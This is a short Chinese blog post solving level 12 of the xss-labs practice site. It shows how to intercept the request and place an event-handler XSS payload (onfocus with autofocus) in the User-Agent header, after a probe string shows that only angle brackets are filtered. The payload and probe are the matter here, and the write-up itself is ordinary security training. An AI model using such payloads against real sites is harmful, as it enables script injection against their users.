技术栈

xss-labs pass-12

Forfun_tt2025-10-24 15:10

查看一下源码,发现这里是user_agent的值,那么就和上一关思路一样,抓包修改UA值

抓包修改先看一下过滤了什么,输入

复制代码
" <Script><a Href=javascript:alert()> oNload Src Data;

只过滤掉了尖括号,我们可以利用事件绕过,payload同上一关,只是这次是在UA处修改

复制代码
" onfocus=alert() autofocus type="text" "

**重点:**User-Agent头传值

上一篇:基本作业-管理⾃⼰的源代码
下一篇:阿里云可观测 2025 年 9 月产品动态
相关推荐
西洼工作室
7 分钟前
项目环境变量配置全攻略
前端
阿珊和她的猫
9 分钟前
Webpack 优化:构建速度与包体积的双重提升
前端·webpack·node.js
阿珊和她的猫
9 分钟前
Webpack 打包体积优化:让应用更轻量、更高效
前端·webpack·状态模式
im_AMBER
9 分钟前
Vite + React 项目启动深度踩坑指南
前端·学习·react.js·前端框架
Hammer Ray
13 分钟前
前端开发基础概念(React)
前端·react.js·前端框架
Sunlightʊə
3 小时前
2.登录页测试用例
运维·服务器·前端·功能测试·单元测试
Code Crafter
3 小时前
ES6-ES14 新特性速查
前端·ecmascript·es6
Lhuu(重开版
3 小时前
CSS从0到1
前端·css·tensorflow
不说别的就是很菜
5 小时前
【前端面试】HTML篇
前端·html
前端一小卒
5 小时前
生产环境Sourcemap策略:从苹果事故看前端构建安全架构设计
前端·javascript
热门推荐
01GitHub 镜像站点02UV安装并设置国内源03安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)04Linux下V2Ray安装配置指南05综合整理:pdf预览显示:你尝试预览的文件可能对你的计算机有害。如果你信任此文件以及其来源,请打开此文件以看其内容,如何解决以正常预览文件06BongoCat - 跨平台键盘猫动画工具07Labelme从安装到标注:零基础完整指南08智能库存管理的需求预测模型:从业务痛点到落地代码的完整实践09《大数据技术原理与应用》实验报告三 熟悉HBase常用操作10NVIDIA显卡驱动、CUDA、cuDNN 和 TensorRT 版本匹配指南